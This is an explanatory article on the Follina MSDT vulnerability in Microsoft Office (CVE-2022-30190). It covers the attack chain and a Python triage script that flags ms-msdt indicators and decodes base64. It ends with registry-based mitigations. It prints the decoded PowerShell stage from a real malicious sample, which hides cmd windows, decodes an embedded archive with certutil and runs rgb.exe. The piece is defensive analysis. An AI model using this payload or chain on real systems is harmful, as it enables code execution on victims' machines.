The Follina Vulnerability: Unveiling Cybersecurity's Achilles Heel

Introduction

Follina is a vulnerability that grabbed attention on May 27, 2022, when a tweet by the research group nao_sec went viral on Twitter, showing the VirusTotal scan results of a malicious Word document. It allows arbitrary code execution (ACE). After becoming aware of the vulnerability, Microsoft released a patch for all of its Office suites. The National Institute of Standards and Technology (NIST) has assigned it the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-30190.

What is Arbitrary Code Execution (ACE)?

Arbitrary code execution describes a flaw in software or hardware that an attacker can exploit to run code of their choosing on the affected system; when the flaw can be triggered from another machine, the result is remote code execution.

How does Follina work?

Follina targets a rarely used Windows component, the Microsoft Support Diagnostic Tool (MSDT). A specially crafted Word or RTF file causes Office to launch MSDT, which in turn downloads and executes attacker-supplied PowerShell code.

Overview:

1. A trojanized Microsoft Office file is sent to the victim via social engineering, phishing, or similar methods.

2. The victim opens the malicious file.

3. Microsoft Office fetches the malicious HTML resource via an external link embedded in the file (discussed in depth below).

4. JavaScript within the HTML invokes MSDT.EXE (Microsoft Support Diagnostic Tool) to execute malicious PowerShell code.

5. PowerShell deploys the second-stage malware.

Deep Dive into the Technical Concept

  • Unzipping the document obtained from nao_sec gives the following result:

  • In the word/_rels/ directory, the file document.xml.rels contains an external relationship pointing to the following address:

  • The address points to an HTML file, RDF842l.html, which is no longer online.
  • The RDF842l.html file contained a script tag whose code is as follows:

  • The script uses the ms-msdt: URL scheme and invokes the PCWDiagnostic troubleshooter with the parameter IT_BrowseForFile, whose value contains PowerShell syntax.
  • At the bottom of the script there is what looks like encoded data; analysis showed it to be base64. Decoding it gives the following output:

Output:

$cmd = "c:\windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

  • The purpose of rgb.exe is unknown, but it is presumably the second-stage component that gives the threat actor code execution on the machine after a single click.
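The analysis steps above can be automated for triage. The following Python helper is an added example, not code from the original article or from nao_sec: it lists the external relationships in word/_rels/document.xml.rels, flags the ms-msdt: scheme and the PCWDiagnostic and IT_BrowseForFile tokens in the fetched HTML, and decodes base64 blobs so the resulting PowerShell can be checked against keywords such as those in the decoded output above. The .docx, the HTML and the base64 blob are constructed samples; the host sample.invalid and the placeholder parameter value are assumptions and are not a working payload.

```python
"""Added Follina triage helper (example code, not from the original article)."""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Constructed document.xml.rels: one normal internal relationship plus one
# external oleObject relationship pointing at a remote HTML file.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://sample.invalid/RDF842l.html" TargetMode="External"/>
</Relationships>"""

# Constructed benign blob standing in for the base64 found at the bottom of the script.
SAMPLE_B64 = base64.b64encode(
    'Start-Process "cmd.exe" -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"'.encode()
).decode()

# Constructed stand-in for the fetched HTML. Only the tokens named in the article
# are present; the parameter value is a placeholder, not the real argument string.
SAMPLE_HTML = (
    "<html><body><script>\n"
    'window.location.href = "ms-msdt:PCWDiagnostic IT_BrowseForFile=CONSTRUCTED_PLACEHOLDER";\n'
    "</script>\n<!-- " + SAMPLE_B64 + " -->\n</body></html>"
)

MSDT_INDICATORS = {
    "msdt_scheme": re.compile(r"ms-msdt:", re.IGNORECASE),
    "pcw_diagnostic": re.compile(r"\bPCWDiagnostic\b", re.IGNORECASE),
    "browse_for_file": re.compile(r"\bIT_BrowseForFile\b", re.IGNORECASE),
}
# Keywords taken from the decoded payload shown above that a reviewer should flag.
SUSPICIOUS_KEYWORDS = ["Start-Process", "-windowstyle hidden", "taskkill",
                       "msdt.exe", "certutil -decode", "expand ", ".rar"]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def build_sample_docx() -> bytes:
    """Build a minimal in-memory .docx (a zip) carrying the constructed rels file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every relationship marked TargetMode="External" in document.xml.rels."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        try:
            rels_xml = zf.read("word/_rels/document.xml.rels")
        except KeyError:
            return []
    root = ET.fromstring(rels_xml)
    return [
        {"id": rel.get("Id"),
         "type": rel.get("Type", "").rsplit("/", 1)[-1],
         "target": rel.get("Target")}
        for rel in root.iter(f"{{{RELS_NS}}}Relationship")
        if rel.get("TargetMode") == "External"
    ]


def scan_html_for_msdt(html: str) -> list[str]:
    """Return the names of the MSDT indicators present in the HTML."""
    return [name for name, rx in MSDT_INDICATORS.items() if rx.search(html)]


def extract_base64_blobs(text: str) -> list[str]:
    """Pull out long base64-looking runs (40+ chars) for decoding."""
    return B64_RUN.findall(text)


def decode_base64_payload(blob: str) -> tuple[str, list[str]]:
    """Decode a base64 blob as text and list the suspicious keywords it contains.

    Padding is repaired first because payloads are often pasted without it;
    anything that is not valid base64 yields an empty result.
    """
    blob = blob.strip()
    padded = blob + "=" * (-len(blob) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return "", []
    hits = [kw for kw in SUSPICIOUS_KEYWORDS if kw.lower() in text.lower()]
    return text, hits


def triage(docx_bytes: bytes, fetched_html: str) -> dict:
    """Combine the checks into one verdict for a document and the HTML it references."""
    externals = find_external_relationships(docx_bytes)
    indicators = scan_html_for_msdt(fetched_html)
    decoded = [decode_base64_payload(b) for b in extract_base64_blobs(fetched_html)]
    return {
        "external_targets": [r["target"] for r in externals],
        "msdt_indicators": indicators,
        "decoded_payloads": [t for t, _ in decoded if t],
        "keyword_hits": sorted({kw for _, hits in decoded for kw in hits}),
        "suspicious": bool(externals) and "msdt_scheme" in indicators,
    }


if __name__ == "__main__":
    for key, value in triage(build_sample_docx(), SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The document check alone is not a verdict: legitimate files also carry external relationships (linked images, templates), so the combination of an external target and an ms-msdt: URL in what it fetches is what makes the sample suspicious. Run the script against a real sample by replacing `build_sample_docx()` with the bytes of the file and `SAMPLE_HTML` with the HTML captured from a sandbox, never fetched from an analyst workstation.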

Consequences of This Vulnerability in the Wild

When Follina came into the spotlight, security researchers also revealed that the vulnerability had already been used in attacks on various governments. The first known attack took place in mid-April and used sextortion threats and invitations to Sputnik Radio interviews as bait. Researchers also reported that the Chinese TA413 hacking group exploited this vulnerability against Tibetan emigrants, and other threat groups used it to target US and EU government agencies.

What is the impact of the Follina vulnerability?

As discussed above, Follina is an arbitrary code execution (ACE) vulnerability, so it is severe; it has a base score of 7.8. Because it can download and execute code of the attacker's choosing, a malicious actor can, for example, obtain a reverse shell and run commands on the victim's machine.

Mitigation for Follina

Microsoft released a patch for this vulnerability in June. Until the patch is applied, the first thing to do is disable the Microsoft Support Diagnostic Tool (MSDT) URL protocol. Secondly, disable the preview pane in Windows Explorer, because previewing a malicious document is another way to trigger the exploit.

1. Disabling MSDT

  • Run Command Prompt as Administrator.
  • Back up the registry key, then execute the following commands one by one (replace filename with the path of the backup file):

      i. reg export HKEY_CLASSES_ROOT\ms-msdt filename

      ii. reg delete HKEY_CLASSES_ROOT\ms-msdt /f

  • To reverse this and re-enable MSDT, import the backup with the following command:

      i. reg import filename

You can also use several defensive tools to protect yourself from the Follina vulnerability:

1. Microsoft Defender for Office 365

This tool for Office 365 can detect Follina exploit documents. When they are attached to emails or linked via URLs, it detects the threat using signatures for the malicious documents.

2. Microsoft Defender Antivirus

This is the antivirus built into the Windows operating system. The latest version of Microsoft Defender Antivirus detects Follina using the signatures published by Microsoft's research team.

Summary

Follina is an ACE-type vulnerability in which a malicious document references external HTML containing JavaScript that invokes MSDT to execute malicious PowerShell code; through this, an attacker can run arbitrary code, deploy a Remote Access Trojan (RAT), or obtain a reverse shell.

FAQs

1. Is Follina patched?

Ans. Microsoft has stated that a patch for the Follina vulnerability has been released for all Microsoft products.

2. What is the severity of Follina?

Ans. The severity is rated High, with a base score of 7.8.

3. Is Follina based on Remote Code Execution (RCE) or Arbitrary Code Execution (ACE)?

Ans. RCE is a type of ACE, and RCE is the classification given to Follina.